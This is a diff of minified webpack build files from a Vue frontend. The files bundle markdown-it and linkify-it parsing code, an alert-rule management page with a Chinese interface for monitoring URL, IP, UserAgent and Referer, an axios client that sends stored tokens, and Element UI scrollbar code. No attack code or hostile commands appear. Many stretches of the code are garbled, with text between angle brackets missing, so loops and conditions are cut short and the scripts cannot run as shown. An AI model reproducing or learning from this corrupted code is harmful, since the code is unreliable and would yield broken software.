\.)+(?:%TLDS%))",t.src_host_strict=t.src_host+t.src_host_terminator,t.tpl_host_fuzzy_strict=t.tpl_host_fuzzy+t.src_host_terminator,t.src_host_port_strict=t.src_host+t.src_port+t.src_host_terminator,t.tpl_host_port_fuzzy_strict=t.tpl_host_fuzzy+t.src_port+t.src_host_terminator,t.tpl_host_port_no_ip_fuzzy_strict=t.tpl_host_no_ip_fuzzy+t.src_port+t.src_host_terminator,t.tpl_host_fuzzy_test="localhost|www\\.|\\.\\d{1,3}\\.|(?:\\.(?:%TLDS%)(?:"+t.src_ZPCc+"|>|$))",t.tpl_email_fuzzy="(^|"+n+'|"|\\(|'+t.src_ZCc+")("+t.src_email_name+"@"+t.tpl_host_fuzzy_strict+")",t.tpl_link_fuzzy="(^|(?![.:/\\-_@])(?:[$+<=>^`||]|"+t.src_ZPCc+"))((?![$+<=>^`||])"+t.tpl_host_port_fuzzy_strict+t.src_path+")",t.tpl_link_no_ip_fuzzy="(^|(?![.:/\\-_@])(?:[$+<=>^`||]|"+t.src_ZPCc+"))((?![$+<=>^`||])"+t.tpl_host_port_no_ip_fuzzy_strict+t.src_path+")",t}},baca:function(e,t,r){"use strict";function n(e){switch(e){case 10:case 33:case 35:case 36:case 37:case 38:case 42:case 43:case 45:case 58:case 60:case 61:case 62:case 64:case 91:case 92:case 93:case 94:case 95:case 96:case 123:case 125:case 126:return!0;default:return!1}}e.exports=function(e,t){var r=e.pos;while(r=0;t--)r=e[t],"text"!==r.type||n||(r.content=r.content.replace(i,a)),"link_open"===r.type&&"auto"===r.info&&n--,"link_close"===r.type&&"auto"===r.info&&n++}function u(e){var t,r,s=0;for(t=e.length-1;t>=0;t--)r=e[t],"text"!==r.type||s||n.test(r.content)&&(r.content=r.content.replace(/\+-/g,"±").replace(/\.{2,}/g,"…").replace(/([?!])…/g,"$1..").replace(/([?!]){4,}/g,"$1$1$1").replace(/,{2,}/g,",").replace(/(^|[^-])---(?=[^-]|$)/gm,"$1—").replace(/(^|\s)--(?=\s|$)/gm,"$1–").replace(/(^|[^-\s])--(?=[^-\s]|$)/gm,"$1–")),"link_open"===r.type&&"auto"===r.info&&s--,"link_close"===r.type&&"auto"===r.info&&s++}e.exports=function(e){var t;if(e.md.options.typographer)for(t=e.tokens.length-1;t>=0;t--)"inline"===e.tokens[t].type&&(s.test(e.tokens[t].content)&&c(e.tokens[t].children),n.test(e.tokens[t].content)&&u(e.tokens[t].children))}},bd68:function(e,t,r){"use strict";e.exports=r("aced")},bf2b:function(e,t,r){"use strict";e.exports=function(e,t,r,n){var s,i,o,a,c,u,l,p=!1,h=e.bMarks[t]+e.tShift[t],f=e.eMarks[t];if(e.sCount[t]-e.blkIndent>=4)return!1;if(h+3>f)return!1;if(s=e.src.charCodeAt(h),126!==s&&96!==s)return!1;if(c=h,h=e.skipChars(h,s),i=h-c,i<3)return!1;if(l=e.src.slice(c,h),o=e.src.slice(h,f),96===s&&o.indexOf(String.fromCharCode(s))>=0)return!1;if(n)return!0;for(a=t;;){if(a++,a>=r)break;if(h=c=e.bMarks[a]+e.tShift[a],f=e.eMarks[a],h=4)&&(h=e.skipChars(h,s),!(h-c\s]/i.test(e)}function i(e){return/^<\/a\s*>/i.test(e)}function o(e){var t=32|e;return t>=97&&t<=122}e.exports=function(e,t){var r,a,c,u,l=e.pos;return!!e.md.options.html&&(c=e.posMax,!(60!==e.src.charCodeAt(l)||l+2>=c)&&(r=e.src.charCodeAt(l+1),!(33!==r&&63!==r&&47!==r&&!o(r))&&(a=e.src.slice(l).match(n),!!a&&(t||(u=e.push("html_inline","",0),u.content=e.src.slice(l,l+a[0].length),s(u.content)&&e.linkLevel++,i(u.content)&&e.linkLevel--),e.pos+=a[0].length,!0))))}},c464:function(e,t,r){"use strict";var n={};function s(e){var t,r,s=n[e];if(s)return s;for(s=n[e]=[],t=0;t<128;t++)r=String.fromCharCode(t),/^[0-9a-z]$/i.test(r)?s.push(r):s.push("%"+("0"+t.toString(16).toUpperCase()).slice(-2));for(t=0;t=55296&&a<=57343){if(a>=55296&&a<=56319&&n+1=56320&&c<=57343)){l+=encodeURIComponent(e[n]+e[n+1]),n++;continue}l+="%EF%BF%BD"}else l+=encodeURIComponent(e[n]);return l}i.defaultChars=";/?:@&=+$,-_.!~*'()#",i.componentChars="-_.!~*'()",e.exports=i},c8a9:function(e,t,r){"use strict";function n(e,t){var r,n,s,i,o,a,c=t.length;for(r=c-1;r>=0;r--)n=t[r],95!==n.marker&&42!==n.marker||-1!==n.end&&(s=t[n.end],a=r>0&&t[r-1].end===n.end+1&&t[r-1].marker===n.marker&&t[r-1].token===n.token-1&&t[n.end+1].token===s.token+1,o=String.fromCharCode(n.marker),i=e.tokens[n.token],i.type=a?"strong_open":"em_open",i.tag=a?"strong":"em",i.nesting=1,i.markup=a?o+o:o,i.content="",i=e.tokens[s.token],i.type=a?"strong_close":"em_close",i.tag=a?"strong":"em",i.nesting=-1,i.markup=a?o+o:o,i.content="",a&&(e.tokens[t[r-1].token].content="",e.tokens[t[n.end+1].token].content="",r--))}e.exports.tokenize=function(e,t){var r,n,s,i=e.pos,o=e.src.charCodeAt(i);if(t)return!1;if(95!==o&&42!==o)return!1;for(n=e.scanDelims(e.pos,42===o),r=0;r=g)return!1;if(_=u,l=e.md.helpers.parseLinkDestination(e.src,u,e.posMax),l.ok){for(f=e.md.normalizeLink(l.str),e.md.validateLink(f)?u=l.pos:f="",_=u;u=g||41!==e.src.charCodeAt(u))&&(b=!0),u++}if(b){if("undefined"===typeof e.env.references)return!1;if(u=0?o=e.src.slice(_,u++):u=a+1):u=a+1,o||(o=e.src.slice(c,a)),p=e.env.references[n(o)],!p)return e.pos=m,!1;f=p.href,d=p.title}return t||(e.pos=c,e.posMax=a,h=e.push("link_open","a",1),h.attrs=r=[["href",f]],d&&r.push(["title",d]),e.linkLevel++,e.md.inline.tokenize(e),e.linkLevel--,h=e.push("link_close","a",-1)),e.pos=u,e.posMax=g,!0}},d4cd:function(e,t,r){"use strict";e.exports=r("08ae")},d5d1:function(e,t,r){"use strict";t.Any=r("cbc7"),t.Cc=r("a7bc"),t.Cf=r("6fd1"),t.P=r("7ca0"),t.Z=r("4fc2")},d670:function(e,t,r){"use strict";var n=r("0068").normalizeReference,s=r("0068").isSpace;e.exports=function(e,t,r,i){var o,a,c,u,l,p,h,f,d,m,g,_,b,k,v,y,C=0,x=e.bMarks[t]+e.tShift[t],A=e.eMarks[t],w=t+1;if(e.sCount[t]-e.blkIndent>=4)return!1;if(91!==e.src.charCodeAt(x))return!1;while(++x3)&&!(e.sCount[w]<0)){for(k=!1,p=0,h=v.length;p",'"',"`"," ","\r","\n","\t"],c=["{","}","|","\\","^","`"].concat(a),u=["'"].concat(c),l=["%","/","?",";","#"].concat(u),p=["/","?","#"],h=255,f=/^[+a-z0-9A-Z_-]{0,63}$/,d=/^([+a-z0-9A-Z_-]{0,63})(.*)$/,m={javascript:!0,"javascript:":!0},g={http:!0,https:!0,ftp:!0,gopher:!0,file:!0,"http:":!0,"https:":!0,"ftp:":!0,"gopher:":!0,"file:":!0};function _(e,t){if(e&&e instanceof n)return e;var r=new n;return r.parse(e,t),r}n.prototype.parse=function(e,t){var r,n,i,a,c,u=e;if(u=u.trim(),!t&&1===e.split("#").length){var _=o.exec(u);if(_)return this.pathname=_[1],_[2]&&(this.search=_[2]),this}var b=s.exec(u);if(b&&(b=b[0],i=b.toLowerCase(),this.protocol=b,u=u.substr(b.length)),(t||b||u.match(/^\/\/[^@\/]+@[^@\/]+/))&&(c="//"===u.substr(0,2),!c||b&&m[b]||(u=u.substr(2),this.slashes=!0)),!m[b]&&(c||b&&!g[b])){var k,v,y=-1;for(r=0;r127?D+="x":D+=w[E];if(!D.match(f)){var S=A.slice(0,r),F=A.slice(r+1),L=w.match(d);L&&(S.push(L[1]),F.unshift(L[2])),F.length&&(u=F.join(".")+u),this.hostname=S.join(".");break}}}}this.hostname.length>h&&(this.hostname=""),x&&(this.hostname=this.hostname.substr(1,this.hostname.length-2))}var z=u.indexOf("#");-1!==z&&(this.hash=u.substr(z),u=u.slice(0,z));var T=u.indexOf("?");return-1!==T&&(this.search=u.substr(T),u=u.slice(0,T)),u&&(this.pathname=u),g[i]&&this.hostname&&!this.pathname&&(this.pathname=""),this},n.prototype.parseHost=function(e){var t=i.exec(e);t&&(t=t[0],":"!==t&&(this.port=t.substr(1)),e=e.substr(0,e.length-t.length)),e&&(this.hostname=e)},e.exports=_},df56:function(e,t,r){"use strict";e.exports=function(e,t,r){var n,s,i,o,a=-1,c=e.posMax,u=e.pos;e.pos=t+1,n=1;while(e.pos32))return c;if(41===s){if(0===i)break;i--}t++}}return a===t||0!==i||(c.str=n(e.slice(a,t)),c.lines=o,c.pos=t,c.ok=!0),c}},e80e:function(e,t,r){"use strict";var n=r("0068").isSpace;e.exports=function(e,t,r,s){var i,o,a,c,u,l,p,h,f,d,m,g,_,b,k,v,y,C,x,A,w=e.lineMax,D=e.bMarks[t]+e.tShift[t],E=e.eMarks[t];if(e.sCount[t]-e.blkIndent>=4)return!1;if(62!==e.src.charCodeAt(D++))return!1;if(s)return!0;c=f=e.sCount[t]+1,32===e.src.charCodeAt(D)?(D++,c++,f++,i=!1,v=!0):9===e.src.charCodeAt(D)?(v=!0,(e.bsCount[t]+f)%4===3?(D++,c++,f++,i=!1):i=!0):v=!1,d=[e.bMarks[t]],e.bMarks[t]=D;while(D=E,b=[e.sCount[t]],e.sCount[t]=f-c,k=[e.tShift[t]],e.tShift[t]=D-e.bMarks[t],C=e.md.block.ruler.getRules("blockquote"),_=e.parentType,e.parentType="blockquote",h=t+1;h=E)break;if(62!==e.src.charCodeAt(D++)||A){if(l)break;for(y=!1,a=0,u=C.length;a=E,m.push(e.bsCount[h]),e.bsCount[h]=e.sCount[h]+1+(v?1:0),b.push(e.sCount[h]),e.sCount[h]=f-c,k.push(e.tShift[h]),e.tShift[h]=D-e.bMarks[h]}}for(g=e.blkIndent,e.blkIndent=0,x=e.push("blockquote_open","blockquote",1),x.markup=">",x.map=p=[t,0],e.md.block.tokenize(e,t,h),x=e.push("blockquote_close","blockquote",-1),x.markup=">",e.lineMax=w,e.parentType=_,p[1]=e.line,a=0;a=3&&":"===e[t-3]||t>=3&&"/"===e[t-3]?0:n.match(r.re.no_http)[0].length:0}},"mailto:":{validate:function(e,t,r){var n=e.slice(t);return r.re.mailto||(r.re.mailto=new RegExp("^"+r.re.src_email_name+"@"+r.re.src_host_strict,"i")),r.re.mailto.test(n)?n.match(r.re.mailto)[0].length:0}}},f="a[cdefgilmnoqrstuwxz]|b[abdefghijmnorstvwyz]|c[acdfghiklmnoruvwxyz]|d[ejkmoz]|e[cegrstu]|f[ijkmor]|g[abdefghilmnpqrstuwy]|h[kmnrtu]|i[delmnoqrst]|j[emop]|k[eghimnprwyz]|l[abcikrstuvy]|m[acdeghklmnopqrstuvwxyz]|n[acefgilopruz]|om|p[aefghklmnrstwy]|qa|r[eosuw]|s[abcdeghijklmnortuvxyz]|t[cdfghjklmnortvwz]|u[agksyz]|v[aceginu]|w[fs]|y[et]|z[amw]",d="biz|com|edu|gov|net|org|pro|web|xxx|aero|asia|coop|info|museum|name|shop|рф".split("|");function m(e){e.__index__=-1,e.__text_cache__=""}function g(e){return function(t,r){var n=t.slice(r);return e.test(n)?n.match(e)[0].length:0}}function _(){return function(e,t){t.normalize(e)}}function b(e){var t=e.re=r("b117")(e.__opts__),n=e.__tlds__.slice();function s(e){return e.replace("%TLDS%",t.src_tlds)}e.onCompile(),e.__tlds_replaced__||n.push(f),n.push(t.src_xn),t.src_tlds=n.join("|"),t.email_fuzzy=RegExp(s(t.tpl_email_fuzzy),"i"),t.link_fuzzy=RegExp(s(t.tpl_link_fuzzy),"i"),t.link_no_ip_fuzzy=RegExp(s(t.tpl_link_no_ip_fuzzy),"i"),t.host_fuzzy_test=RegExp(s(t.tpl_host_fuzzy_test),"i");var l=[];function p(e,t){throw new Error('(LinkifyIt) Invalid schema "'+e+'": '+t)}e.__compiled__={},Object.keys(e.__schemas__).forEach((function(t){var r=e.__schemas__[t];if(null!==r){var n={validate:null,link:null};if(e.__compiled__[t]=n,o(r))return a(r.validate)?n.validate=g(r.validate):c(r.validate)?n.validate=r.validate:p(t,r),void(c(r.normalize)?n.normalize=r.normalize:r.normalize?p(t,r):n.normalize=_());i(r)?l.push(t):p(t,r)}})),l.forEach((function(t){e.__compiled__[e.__schemas__[t]]&&(e.__compiled__[t].validate=e.__compiled__[e.__schemas__[t]].validate,e.__compiled__[t].normalize=e.__compiled__[e.__schemas__[t]].normalize)})),e.__compiled__[""]={validate:null,normalize:_()};var h=Object.keys(e.__compiled__).filter((function(t){return t.length>0&&e.__compiled__[t]})).map(u).join("|");e.re.schema_test=RegExp("(^|(?!_)(?:[><|]|"+t.src_ZPCc+"))("+h+")","i"),e.re.schema_search=RegExp("(^|(?!_)(?:[><|]|"+t.src_ZPCc+"))("+h+")","ig"),e.re.schema_at_start=RegExp("^"+e.re.schema_search.source,"i"),e.re.pretest=RegExp("("+e.re.schema_test.source+")|("+e.re.host_fuzzy_test.source+")|@","i"),m(e)}function k(e,t){var r=e.__index__,n=e.__last_index__,s=e.__text_cache__.slice(r,n);this.schema=e.__schema__.toLowerCase(),this.index=r+t,this.lastIndex=n+t,this.raw=s,this.text=s,this.url=s}function v(e,t){var r=new k(e,t);return e.__compiled__[r.schema].normalize(r,e),r}function y(e,t){if(!(this instanceof y))return new y(e,t);t||p(e)&&(t=e,e={}),this.__opts__=n({},l,t),this.__index__=-1,this.__last_index__=-1,this.__schema__="",this.__text_cache__="",this.__schemas__=n({},h,e),this.__compiled__={},this.__tlds__=d,this.__tlds_replaced__=!1,this.re={},b(this)}y.prototype.add=function(e,t){return this.__schemas__[e]=t,b(this),this},y.prototype.set=function(e){return this.__opts__=n(this.__opts__,e),this},y.prototype.test=function(e){if(this.__text_cache__=e,this.__index__=-1,!e.length)return!1;var t,r,n,s,i,o,a,c,u;if(this.re.schema_test.test(e)){a=this.re.schema_search,a.lastIndex=0;while(null!==(t=a.exec(e)))if(s=this.testSchemaAt(e,t[2],a.lastIndex),s){this.__schema__=t[2],this.__index__=t.index+t[1].length,this.__last_index__=t.index+t[0].length+s;break}}return this.__opts__.fuzzyLink&&this.__compiled__["http:"]&&(c=e.search(this.re.host_fuzzy_test),c>=0&&(this.__index__<0||c=0&&null!==(n=e.match(this.re.email_fuzzy))&&(i=n.index+n[1].length,o=n.index+n[0].length,(this.__index__<0||ithis.__last_index__)&&(this.__schema__="mailto:",this.__index__=i,this.__last_index__=o))),this.__index__>=0},y.prototype.pretest=function(e){return this.re.pretest.test(e)},y.prototype.testSchemaAt=function(e,t,r){return this.__compiled__[t.toLowerCase()]?this.__compiled__[t.toLowerCase()].validate(e,r,this):0},y.prototype.match=function(e){var t=0,r=[];this.__index__>=0&&this.__text_cache__===e&&(r.push(v(this,t)),t=this.__last_index__);var n=t?e.slice(t):e;while(this.test(n))r.push(v(this,t)),n=n.slice(this.__last_index__),t+=this.__last_index__;return r.length?r:null},y.prototype.matchAtStart=function(e){if(this.__text_cache__=e,this.__index__=-1,!e.length)return null;var t=this.re.schema_at_start.exec(e);if(!t)return null;var r=this.testSchemaAt(e,t[2],t[0].length);return r?(this.__schema__=t[2],this.__index__=t.index+t[1].length,this.__last_index__=t.index+t[0].length+r,v(this,0)):null},y.prototype.tlds=function(e,t){return e=Array.isArray(e)?e:[e],t?(this.__tlds__=this.__tlds__.concat(e).sort().filter((function(e,t,r){return e!==r[t-1]})).reverse(),b(this),this):(this.__tlds__=e.slice(),this.__tlds_replaced__=!0,b(this),this)},y.prototype.normalize=function(e){e.schema||(e.url="http://"+e.url),"mailto:"!==e.schema||/^mailto:/i.test(e.url)||(e.url="mailto:"+e.url)},y.prototype.onCompile=function(){},e.exports=y},fdfe:function(e,t,r){"use strict";var n=r("0068").isSpace;e.exports=function(e,t,r,s){var i,o,a,c,u=e.bMarks[t]+e.tShift[t],l=e.eMarks[t];if(e.sCount[t]-e.blkIndent>=4)return!1;if(i=e.src.charCodeAt(u++),42!==i&&45!==i&&95!==i)return!1;o=1;while(u9,expression:"total > 9"}],staticStyle:{"margin-left":"-20px","margin-top":"-10px"},attrs:{total:e.total,page:e.listQuery.page,limit:e.listQuery.limit},on:{"update:page":function(t){return e.$set(e.listQuery,"page",t)},"update:limit":function(t){return e.$set(e.listQuery,"limit",t)},pagination:e.getalterList}})],1),a("el-drawer",{attrs:{visible:e.messagePop,direction:e.direction,size:"50%",title:"告警规则查看"},on:{"update:visible":function(t){e.messagePop=t}}},[[a("div",{staticClass:"demo-drawer__content"},[a("el-form",{ref:"form"},[a("el-breadcrumb",{staticStyle:{"margin-left":"20px","margin-bottom":"20px"},attrs:{"separator-class":"el-icon-arrow-right"}},[a("el-breadcrumb-item",[e._v("基础信息")]),a("el-breadcrumb-item",[e._v("规则信息")])],1),a("el-descriptions",{staticStyle:{margin:"20px"},attrs:{direction:"vertical",column:3,border:""}},[a("el-descriptions-item",{attrs:{label:"告警规则名"}},[e._v(e._s(e.alterRulesRead.alterName))]),a("el-descriptions-item",{attrs:{label:"监测频率"}},[a("el-tag",{attrs:{size:"small"}},[e._v(e._s(e.alterRulesRead.alterFrequency)+"/次")])],1),a("el-descriptions-item",{attrs:{label:"监测周期"}},[1==e.alterRulesRead.alterTime?a("span",[e._v("每分钟")]):e._e(),2==e.alterRulesRead.alterTime?a("span",[e._v("每小时")]):e._e()])],1),a("el-breadcrumb",{staticStyle:{"margin-top":"28px","margin-left":"20px","margin-bottom":"30px"},attrs:{"separator-class":"el-icon-arrow-right"}},[a("el-breadcrumb-item",[e._v("告警信息")]),a("el-breadcrumb-item",[e._v("激活记录")])],1),a("el-timeline",{staticStyle:{"margin-right":"40px"}},e._l(e.attackTimeLineData,(function(t,r){return a("el-timeline-item",{key:r,attrs:{timestamp:t.alterCreateTime,placement:"top"}},[a("el-card",[a("h4",[e._v("告警: "+e._s(t.alterInfo))]),a("p",[e._v("发布于 "+e._s(t.alterCreateTime))])])],1)})),1),a("div",{staticClass:"row_pop"},[a("pagination",{directives:[{name:"show",rawName:"v-show",value:e.attackTimeLineQuery.total>9,expression:"attackTimeLineQuery.total > 9"}],staticStyle:{"margin-left":"-20px"},attrs:{total:e.attackTimeLineQuery.total,page:e.attackTimeLineQuery.page,limit:e.attackTimeLineQuery.limit},on:{"update:page":function(t){return e.$set(e.attackTimeLineQuery,"page",t)},"update:limit":function(t){return e.$set(e.attackTimeLineQuery,"limit",t)},pagination:e.lookBtn}})],1)],1),a("div",{staticClass:"demo-drawer__footer"},[a("el-button",{attrs:{size:"small"},on:{click:function(t){return e.returnBtn()}}},[e._v(" 返回")])],1)],1)]],2)],1)},l=[],i=(a("a15b"),a("333d")),n=a("b775"),s=a("4328"),o=a.n(s);function c(e){return n["a"].post("/alter/lists",o.a.stringify(e))}function u(e){return n["a"].post("/alter/timeLineLogs",o.a.stringify(e))}function m(e){return n["a"].post("/alter/read",o.a.stringify(e))}function d(e){return n["a"].post("/alter/add",o.a.stringify(e))}function p(e){return n["a"].post("/alter/alterChannelLists",o.a.stringify(e))}function f(e){return n["a"].post("/alter/changeStatus",o.a.stringify(e))}function g(e){return n["a"].post("/alter/delete",o.a.stringify(e))}var b={name:"",components:{Pagination:i["a"]},props:{},data:function(){return{readId:0,attackTimeLineData:[],attackTimeLineQuery:{total:0,page:1,limit:10},newAlterSize:"45%",globalCheck:{alterUrl:!1,alterUserAgent:!1,alterIpaddr:!1,alterReferer:!1},alterRulesRead:{},editFlag:!0,numberData:{number:"",analysis:"",grade:"0"},reportData:[],devote:"devote desc",messagePop:!1,createAlterState:!1,direction:"rtl",listLoading:!1,orderServiceBasePageInfo:{currentPage:1,pageSize:10,total:0},total:0,listQuery:{importance:void 0,title:void 0,type:void 0,page:1,limit:10},channelData:[],createAlterSource:{alterFrequency:0,alterCribTimeSource:void 0,alterCribTimeStatic:void 0},monitorParamets:[{label:"配置URL",value:"url"},{label:"配置IP",value:"ip"},{label:"配置UserAgent",value:"ua"},{label:"配置Referer",value:"rf"}],searchService:{interviewer:"",business:""},agency:{value:"",options:[]},readAssocLists:[],total_pop:0,dataLists:[],listQuery_pop:{importance:void 0,title:void 0,type:void 0,page:1,limit:10}}},computed:{},watch:{},created:function(){},mounted:function(){this.getalterList(),this.checkDv()},methods:{deleteAlter:function(e){var t=this;this.$confirm("是否确定删除告警规则?","确认信息",{distinguishCancelAndClose:!0,confirmButtonText:"确定",cancelButtonText:"返回"}).then((function(){g({Id:e.alterId}).then((function(e){1===e.status?(t.$message.success(e.msg),t.getalterList()):t.$message.error(e.msg)}))})).catch((function(e){}))},changeOptions:function(e){var t=this;this.$confirm("是否确定切换告警规则状态?","确认信息",{distinguishCancelAndClose:!0,confirmButtonText:"确定切换",cancelButtonText:"返回"}).then((function(){f({Id:e.alterId}).then((function(e){1===e.status?(t.$message.success(e.msg),t.getalterList()):t.$message.error(e.msg)}))})).catch((function(e){}))},checkDv:function(){var e=document.body.clientWidth;1440!=e&&(this.newAlterSize="43%")},cleanInptsJobs:function(){2==this.createAlterSource.alterScenes&&(this.createAlterSource.alterParametItems=[],this.globalCheck={alterUrl:!1,alterUserAgent:!1,alterIpaddr:!1,alterReferer:!1},this.createAlterSource.alterCribTimeSource=void 0,this.createAlterSource.alterCribTimeStatic=void 0)},pullJobs:function(e){e.indexOf("url")>-1?this.globalCheck.alterUrl=!0:this.globalCheck.alterUrl=!1,e.indexOf("ua")>-1?this.globalCheck.alterUserAgent=!0:this.globalCheck.alterUserAgent=!1,e.indexOf("ip")>-1?this.globalCheck.alterIpaddr=!0:this.globalCheck.alterIpaddr=!1,e.indexOf("rf")>-1?this.globalCheck.alterReferer=!0:this.globalCheck.alterReferer=!1},stateFormat:function(e,t){return 0===e.alterAction?"待决策":1===e.alterAction?"已决策":2===e.alterAction?"投递中":3===e.alterAction?"已传递":void 0},alterRobotAnalyze:function(e,t){return 0===e.alterRobotAnalyze?"未分析":1===e.alterRobotAnalyze?"分析中":2===e.alterRobotAnalyze?"已分析":void 0},confirmEditBtn:function(){this.editFlag=!0},newRulesBtn:function(){var e=this;p().then((function(t){if(1===t.status){for(var a=[],r=0;r2)if(c=b(c),t=c.charCodeAt(0),43===t||45===t){if(a=c.charCodeAt(2),88===a||120===a)return NaN}else if(48===t){switch(c.charCodeAt(1)){case 66:case 98:r=2,l=49;break;case 79:case 111:r=8,l=55;break;default:return+c}for(i=c.slice(2),n=i.length,s=0;sl)return NaN;return parseInt(i,r)}return+c};if(i(h,!S(" 0o1")||!S("0b1")||S("+0x1"))){for(var _,k=function(e){var t=arguments.length<1?0:e,a=this;return a instanceof k&&(A?m((function(){v.valueOf.call(a)})):o(a)!=h)?c(new S(y(t)),a,k):y(t)},C=r?p(S):"MAX_VALUE,MIN_VALUE,NaN,NEGATIVE_INFINITY,POSITIVE_INFINITY,EPSILON,isFinite,isInteger,isNaN,isSafeInteger,MAX_SAFE_INTEGER,MIN_SAFE_INTEGER,parseFloat,parseInt,isInteger".split(","),w=0;C.length>w;w++)s(S,_=C[w])&&!s(k,_)&&g(k,_,f(S,_));k.prototype=v,v.constructor=k,n(l,h,k)}},b775:function(e,t,a){"use strict";a("d3b7");var r=a("bc3a"),l=a.n(r),i=a("5c96"),n=l.a.create({baseURL:"/prod-api",timeout:5e3});n.interceptors.request.use((function(e){return e.headers["token"]=localStorage.getItem("token"),e.headers["website"]=localStorage.getItem("websiteDomain"),e.headers["roles"]=localStorage.getItem("roles"),e}),(function(e){return Promise.reject(e)})),n.interceptors.response.use((function(e){var t=e.data;return t}),(function(e){return Object(i["Notification"])({message:e.message,title:"错误",type:"error"}),Promise.reject(e)})),t["a"]=n},d597:function(e,t,a){"use strict";a("dea7")},dea7:function(e,t,a){},f1df:function(e,t,a){"use strict";a("8312")}}]); \ No newline at end of file diff --git a/frontend/dist/static/js/chunk-elementUI.b2342cd8.js b/frontend/dist/static/js/chunk-elementUI.b2342cd8.js new file mode 100644 index 0000000..a9aa962 --- /dev/null +++ b/frontend/dist/static/js/chunk-elementUI.b2342cd8.js @@ -0,0 +1 @@ +(window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["chunk-elementUI"],{"0fae":function(e,t,i){},"12f2":function(e,t,i){"use strict";t.__esModule=!0,t.default=function(e){return{methods:{focus:function(){this.$refs[e].focus()}}}}},"14e9":function(e,t,i){e.exports=function(e){var t={};function i(n){if(t[n])return t[n].exports;var s=t[n]={i:n,l:!1,exports:{}};return e[n].call(s.exports,s,s.exports,i),s.l=!0,s.exports}return i.m=e,i.c=t,i.d=function(e,t,n){i.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},i.r=function(e){"undefined"!==typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},i.t=function(e,t){if(1&t&&(e=i(e)),8&t)return e;if(4&t&&"object"===typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(i.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var s in e)i.d(n,s,function(t){return e[t]}.bind(null,s));return n},i.n=function(e){var t=e&&e.__esModule?function(){return e["default"]}:function(){return e};return i.d(t,"a",t),t},i.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},i.p="/dist/",i(i.s=131)}({131:function(e,t,i){"use strict";i.r(t);var n=i(16),s=i(38),r=i.n(s),a=i(3),o=i(2),l={vertical:{offset:"offsetHeight",scroll:"scrollTop",scrollSize:"scrollHeight",size:"height",key:"vertical",axis:"Y",client:"clientY",direction:"top"},horizontal:{offset:"offsetWidth",scroll:"scrollLeft",scrollSize:"scrollWidth",size:"width",key:"horizontal",axis:"X",client:"clientX",direction:"left"}};function c(e){var t=e.move,i=e.size,n=e.bar,s={},r="translate"+n.axis+"("+t+"%)";return s[n.size]=i,s.transform=r,s.msTransform=r,s.webkitTransform=r,s}var u={name:"Bar",props:{vertical:Boolean,size:String,move:Number},computed:{bar:function(){return l[this.vertical?"vertical":"horizontal"]},wrap:function(){return this.$parent.wrap}},render:function(e){var t=this.size,i=this.move,n=this.bar;return e("div",{class:["el-scrollbar__bar","is-"+n.key],on:{mousedown:this.clickTrackHandler}},[e("div",{ref:"thumb",class:"el-scrollbar__thumb",on:{mousedown:this.clickThumbHandler},style:c({size:t,move:i,bar:n})})])},methods:{clickThumbHandler:function(e){e.ctrlKey||2===e.button||(this.startDrag(e),this[this.bar.axis]=e.currentTarget[this.bar.offset]-(e[this.bar.client]-e.currentTarget.getBoundingClientRect()[this.bar.direction]))},clickTrackHandler:function(e){var t=Math.abs(e.target.getBoundingClientRect()[this.bar.direction]-e[this.bar.client]),i=this.$refs.thumb[this.bar.offset]/2,n=100*(t-i)/this.$el[this.bar.offset];this.wrap[this.bar.scroll]=n*this.wrap[this.bar.scrollSize]/100},startDrag:function(e){e.stopImmediatePropagation(),this.cursorDown=!0,Object(o["on"])(document,"mousemove",this.mouseMoveDocumentHandler),Object(o["on"])(document,"mouseup",this.mouseUpDocumentHandler),document.onselectstart=function(){return!1}},mouseMoveDocumentHandler:function(e){if(!1!==this.cursorDown){var t=this[this.bar.axis];if(t){var i=-1*(this.$el.getBoundingClientRect()[this.bar.direction]-e[this.bar.client]),n=this.$refs.thumb[this.bar.offset]-t,s=100*(i-n)/this.$el[this.bar.offset];this.wrap[this.bar.scroll]=s*this.wrap[this.bar.scrollSize]/100}}},mouseUpDocumentHandler:function(e){this.cursorDown=!1,this[this.bar.axis]=0,Object(o["off"])(document,"mousemove",this.mouseMoveDocumentHandler),document.onselectstart=null}},destroyed:function(){Object(o["off"])(document,"mouseup",this.mouseUpDocumentHandler)}},h={name:"ElScrollbar",components:{Bar:u},props:{native:Boolean,wrapStyle:{},wrapClass:{},viewClass:{},viewStyle:{},noresize:Boolean,tag:{type:String,default:"div"}},data:function(){return{sizeWidth:"0",sizeHeight:"0",moveX:0,moveY:0}},computed:{wrap:function(){return this.$refs.wrap}},render:function(e){var t=r()(),i=this.wrapStyle;if(t){var n="-"+t+"px",s="margin-bottom: "+n+"; margin-right: "+n+";";Array.isArray(this.wrapStyle)?(i=Object(a["toObject"])(this.wrapStyle),i.marginRight=i.marginBottom=n):"string"===typeof this.wrapStyle?i+=s:i=s}var o=e(this.tag,{class:["el-scrollbar__view",this.viewClass],style:this.viewStyle,ref:"resize"},this.$slots.default),l=e("div",{ref:"wrap",style:i,on:{scroll:this.handleScroll},class:[this.wrapClass,"el-scrollbar__wrap",t?"":"el-scrollbar__wrap--hidden-default"]},[[o]]),c=void 0;return c=this.native?[e("div",{ref:"wrap",class:[this.wrapClass,"el-scrollbar__wrap"],style:i},[[o]])]:[l,e(u,{attrs:{move:this.moveX,size:this.sizeWidth}}),e(u,{attrs:{vertical:!0,move:this.moveY,size:this.sizeHeight}})],e("div",{class:"el-scrollbar"},c)},methods:{handleScroll:function(){var e=this.wrap;this.moveY=100*e.scrollTop/e.clientHeight,this.moveX=100*e.scrollLeft/e.clientWidth},update:function(){var e=void 0,t=void 